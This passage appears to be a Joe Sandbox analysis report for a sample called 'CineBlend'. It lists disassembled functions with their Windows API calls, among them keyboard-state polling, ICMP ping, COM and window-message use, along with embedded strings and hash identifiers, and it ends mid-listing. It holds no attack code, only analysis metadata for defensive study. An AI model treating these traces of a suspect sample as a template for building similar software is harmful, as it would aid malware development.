Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: b53b6b4f58029e5e1e0061f71cac4b8c3a5e02f6f52f59da80f1ece8e2c7277b
Instruction ID: d5de95764b18b2ba17a862b5309a72c75a7890b51c95ed48bdc2b1c2486b254e
Opcode Fuzzy Hash: b53b6b4f58029e5e1e0061f71cac4b8c3a5e02f6f52f59da80f1ece8e2c7277b
Instruction Fuzzy Hash: 7BC13571608301AFD700DF68C88496BBBE9FF89748F1049ADF98A9B211DB71ED05CB52

Function 00BA84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BA8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BA85D4
SHGetDesktopFolder.SHELL32(?), ref: 00BA85E8
CoCreateInstance.OLE32(00BD0CD4,00000000,00000001,00BF7E8C,?), ref: 00BA8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BA86B9
CoTaskMemFree.OLE32(?,?), ref: 00BA8711
SHBrowseForFolderW.SHELL32(?), ref: 00BA879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BA87BF
CoTaskMemFree.OLE32(00000000), ref: 00BA87C6
CoTaskMemFree.OLE32(00000000), ref: 00BA881B
CoUninitialize.OLE32 ref: 00BA8821

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: ec96b8ba656983f9f48bd5ac240ff25cd6cd7110888e677580d6b21ba1568e07
Instruction ID: 84d393fba7ddaa55b397d1bcdc0577ac92e2b7ccf8d1d3a284dc6d324226b773
Opcode Fuzzy Hash: ec96b8ba656983f9f48bd5ac240ff25cd6cd7110888e677580d6b21ba1568e07
Instruction Fuzzy Hash: 16C12A75A04205AFCB14DFA4C884DAEBBF9FF49304B1485A8F919AB761DB30ED45CB90

Function 00BC5EBC Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BC5FA3
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC5FB4
CharNextW.USER32(00000158), ref: 00BC5FE3
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BC6024
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BC603A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BC604B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: e0e519ca39a4f6474b0cfc7d986b493ee996bed197bb22f837ab841f45d1ae09
Instruction ID: efd1fcccc1d1b78225d5686f08b487d3d484dcf937ed7da659972cfc11a8d5a6
Opcode Fuzzy Hash: e0e519ca39a4f6474b0cfc7d986b493ee996bed197bb22f837ab841f45d1ae09
Instruction Fuzzy Hash: C8616A75900209ABDF259F54CC84FFE7BF8EB49750F10819DF925AB290C774AA81DB60

Function 00B90378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B9039F
SafeArrayAllocData.OLEAUT32(?), ref: 00B903F8
VariantInit.OLEAUT32(?), ref: 00B9040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00B9042A
VariantCopy.OLEAUT32(?,?), ref: 00B9047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00B90491
VariantClear.OLEAUT32(?), ref: 00B904A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00B904B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B904BC
VariantClear.OLEAUT32(?), ref: 00B904CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B904D9

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c02a0bfb9677073ea2e80e0d78b8b01bbbef998ca3da7b93b85f24b367b35a7a
Instruction ID: d3c8617b540004388dc3314a54e1ec386a82425b5f92fc3031e1416d073daf19
Opcode Fuzzy Hash: c02a0bfb9677073ea2e80e0d78b8b01bbbef998ca3da7b93b85f24b367b35a7a
Instruction Fuzzy Hash: 55414F75A00219DFCF14EFA4D844DAEBBF9EF48344F0080B9EA55A7361DB34A945CBA0

Function 00B9A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B9A65D
GetAsyncKeyState.USER32(000000A0), ref: 00B9A6DE
GetKeyState.USER32(000000A0), ref: 00B9A6F9
GetAsyncKeyState.USER32(000000A1), ref: 00B9A713
GetKeyState.USER32(000000A1), ref: 00B9A728
GetAsyncKeyState.USER32(00000011), ref: 00B9A740
GetKeyState.USER32(00000011), ref: 00B9A752
GetAsyncKeyState.USER32(00000012), ref: 00B9A76A
GetKeyState.USER32(00000012), ref: 00B9A77C
GetAsyncKeyState.USER32(0000005B), ref: 00B9A794
GetKeyState.USER32(0000005B), ref: 00B9A7A6

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 845f9a26121ed0fa654c5797dbb71afbf4fa53992f33f6eb7c4d7fe817304966
Instruction ID: 4910c2bc0afec34ebb80a13169b8c1bf90a0196a03cf049a52c3f69a9f4a755b
Opcode Fuzzy Hash: 845f9a26121ed0fa654c5797dbb71afbf4fa53992f33f6eb7c4d7fe817304966
Instruction Fuzzy Hash: 6841A4645047C96AFF3197A488457A5BEF0EB25348F0880F9D5C65B1C2EBA89DC8C7E3

Function 00BB0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00BB1019
inet_addr.WSOCK32(?), ref: 00BB1079
gethostbyname.WSOCK32(?), ref: 00BB1085
IcmpCreateFile.IPHLPAPI ref: 00BB1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB1142
IcmpCloseHandle.IPHLPAPI(?), ref: 00BB1216
WSACleanup.WSOCK32 ref: 00BB121C

Strings

Ping, xrefs: 00BB10D3

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 0e0b307f1a2157b0831860799be252321ccb7b4791579efe75489ad5a15f693f
Instruction ID: 0d2d552b2ddc8a358e11e7d26b2096fcb7638abab29611cfbeb247b4378b172e
Opcode Fuzzy Hash: 0e0b307f1a2157b0831860799be252321ccb7b4791579efe75489ad5a15f693f
Instruction Fuzzy Hash: 9391BE316042019FD720DF19C898F66BBE0EF48318F5489E9F569AB6A2C7B0ED45CB81

Function 00BB9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00BB9750

Part of subcall function 00B99805: _wcslen.LIBCMT ref: 00B99828

_wcslen.LIBCMT ref: 00BB97AB
_wcslen.LIBCMT ref: 00BB97F9
_wcslen.LIBCMT ref: 00BB9839
_wcslen.LIBCMT ref: 00BB98CB

Strings

none, xrefs: 00BB98C2, 00BB98C7
stdcall, xrefs: 00BB9833, 00BB9838
cdecl, xrefs: 00BB97A5, 00BB97AA
winapi, xrefs: 00BB97F3, 00BB97F8

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: b04a92525a79099b189ef9b819747d56d3eb286cacff93e29256e99fcb2cbb23
Instruction ID: 38d3cb73d84f8f905716944f8eb6b270ffd515c9cb87fd084c0bed934d4180b7
Opcode Fuzzy Hash: b04a92525a79099b189ef9b819747d56d3eb286cacff93e29256e99fcb2cbb23
Instruction Fuzzy Hash: 1D51F432A00516ABCF14DF68CD809FEB3E5FF65360B2042A9EA66E7284DB71DD40C790

Function 00BB4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00BB41D1
CoUninitialize.OLE32 ref: 00BB41DC
CoCreateInstance.OLE32(?,00000000,00000017,00BD0B44,?), ref: 00BB4236
IIDFromString.OLE32(?,?), ref: 00BB42A9
VariantInit.OLEAUT32(?), ref: 00BB4341
VariantClear.OLEAUT32(?), ref: 00BB4393

Strings

NULL Pointer assignment, xrefs: 00BB427B
Invalid parameter, xrefs: 00BB42C2
Failed to create object, xrefs: 00BB4241, 00BB42F7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 9b7daba5220b2a69ecfee562b7e1f1a0b036be50b0b22b61c67fe09cd9db3b35
Instruction ID: aafb6c80e734735b50bab4b3f8bf846b3aed6651763fb5b09c73d57d42d979fe
Opcode Fuzzy Hash: 9b7daba5220b2a69ecfee562b7e1f1a0b036be50b0b22b61c67fe09cd9db3b35
Instruction Fuzzy Hash: 4061BF716087019FD710DF64C889FAABBE4FF49714F040999F9819B292DBB0ED48CB92

Function 00BA8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00BA8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BA8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BA8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BA8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BA8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00BA8DDA

Strings

*.*, xrefs: 00BA8DE0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 715d874c1403e16f10aed1a18d96662fd2a7d5ac3775997372f9a0448c0ad37d
Instruction ID: 540bcf1c0a4d8f6d452f562ab5682a91cdad4222decccb740682f78c638467ad
Opcode Fuzzy Hash: 715d874c1403e16f10aed1a18d96662fd2a7d5ac3775997372f9a0448c0ad37d
Instruction Fuzzy Hash: 40616DB65083059FCB10EF60C845A9EB7E8FF89310F1449AEF999C7251EB31E945CB92

Function 00BA3DCD Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00BA3E14

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00BA3E35

Strings

"%s" (%d) : ==> %s:, xrefs: 00BA3F67
Error: , xrefs: 00BA3F16
Incorrect parameters to object property !, xrefs: 00BA3EF0
"%s" (%d) : ==> %s:%s%s, xrefs: 00BA3F49
^ ERROR , xrefs: 00BA3EE3
Line %d (File "%s"):, xrefs: 00BA3E88, 00BA3EA1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: c289469dcd45bf9673dde330dac9a42cc551ac9e9950add91818cd4bbbbc0a3b
Instruction ID: 957ee65a8aa5367f1f149b1d637342903e054af3a83a5f17d227b67c44c63f14
Opcode Fuzzy Hash: c289469dcd45bf9673dde330dac9a42cc551ac9e9950add91818cd4bbbbc0a3b
Instruction Fuzzy Hash: 0551807190420AAACF15EBE0CD46EEEB7F8AF04700F2040E5B505B2062EB716F59DB61

Function 00BA5DD8 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BA5DE5
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BA5E5B
GetLastError.KERNEL32 ref: 00BA5E65
SetErrorMode.KERNEL32(00000000,READY), ref: 00BA5EEC

Strings

NOTREADY, xrefs: 00BA5E90
INVALID, xrefs: 00BA5E9E
READONLY, xrefs: 00BA5E97
UNKNOWN, xrefs: 00BA5E89
READY, xrefs: 00BA5EA5, 00BA5EAD

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 49290466d9ef7de6c1eaa0151a37f36f83f9b870fbcaf60bf7f448235c9edbb6
Instruction ID: 15d8a073b11216b8e77493fb38e775f41f0e5ae322169845e3096894f1b1c90f
Opcode Fuzzy Hash: 49290466d9ef7de6c1eaa0151a37f36f83f9b870fbcaf60bf7f448235c9edbb6
Instruction Fuzzy Hash: 92317375A04605DFCB20DF68C484AAABBF4EF46304F1480E9E505DB296DB71DF46CB91

Function 00BC46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00BC4715
SetMenu.USER32(?,00000000), ref: 00BC4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC47AC
IsMenu.USER32(?), ref: 00BC47C0
CreatePopupMenu.USER32 ref: 00BC47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BC47F7
DrawMenuBar.USER32 ref: 00BC47FF

Strings

0, xrefs: 00BC46F0
F, xrefs: 00BC47EA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 9fe94096e9b38297a9b8ab8ea86c5485906024ce018f509211fddc23edc11608
Instruction ID: e255b9916527e2970c4541e8cc1f6fdef2c7f753476cb168af41dd39f735f662
Opcode Fuzzy Hash: 9fe94096e9b38297a9b8ab8ea86c5485906024ce018f509211fddc23edc11608
Instruction Fuzzy Hash: B0416779A01209AFDB14CFA4D998FAA7BF5FF09314F14406DFA45A7350CB70AA14CB50

Function 00B9282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B928B1
GetDlgCtrlID.USER32 ref: 00B928BC
GetParent.USER32 ref: 00B928D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B928DB
GetDlgCtrlID.USER32(?), ref: 00B928E4
GetParent.USER32(?), ref: 00B928F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B928FB

Strings

ListBox, xrefs: 00B9286E
ComboBox, xrefs: 00B92839

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: d70b793775dc0958708ef62abf8eadd71d371d31ca04e60a4cc445efa30da906
Instruction ID: db197b1f3c4d0b91ec62269148962774e3191bba37471b04ae73bc0e9f298c49
Opcode Fuzzy Hash: d70b793775dc0958708ef62abf8eadd71d371d31ca04e60a4cc445efa30da906
Instruction Fuzzy Hash: 4221A475E00118BBCF05AFA0CC85EEEBBF4EF09350F1041B6B951A72A5DB755809DB60

Function 00B9290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00B945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B94620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B92990
GetDlgCtrlID.USER32 ref: 00B9299B
GetParent.USER32 ref: 00B929B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B929BA
GetDlgCtrlID.USER32(?), ref: 00B929C3
GetParent.USER32(?), ref: 00B929D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B929DA

Strings

ListBox, xrefs: 00B9294F
ComboBox, xrefs: 00B9291A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 89f20770ab58934fc85181fbba01bdae824ac124687a0d69a0970ac26c3302e7
Instruction ID: eaa186a084d42eaf55a92847f71305a3f6914643cb25e7c4ff22798b1ebdef43
Opcode Fuzzy Hash: 89f20770ab58934fc85181fbba01bdae824ac124687a0d69a0970ac26c3302e7
Instruction Fuzzy Hash: 8E216F75E00118BBCF11ABA4CC85EEEBBF8EF09340F1041B6BA51A72A5DB755909DB60

Function 00BC44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BC4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BC453C
GetWindowLongW.USER32(?,000000F0), ref: 00BC4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BC4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BC45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00BC4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00BC4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00BC467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00BC4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00BC46AF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 462d6d3e0216f2f099e6ff74dfad8ec50ddaac8b1a3b7080fe5d4a84cb8eaa47
Instruction ID: a8d98bf096251e73da34ed9f4f8cc572c6504e62a49b38b5649550d7b133212d
Opcode Fuzzy Hash: 462d6d3e0216f2f099e6ff74dfad8ec50ddaac8b1a3b7080fe5d4a84cb8eaa47
Instruction Fuzzy Hash: 3C616975A00218AFDB20DFA4CC85FEE77F8EB09710F1041AAFA14A72A1D774AA45DB50

Function 00B9BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B9BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00B9BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B9ABA8,?,00000001), ref: 00B9BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9BB54
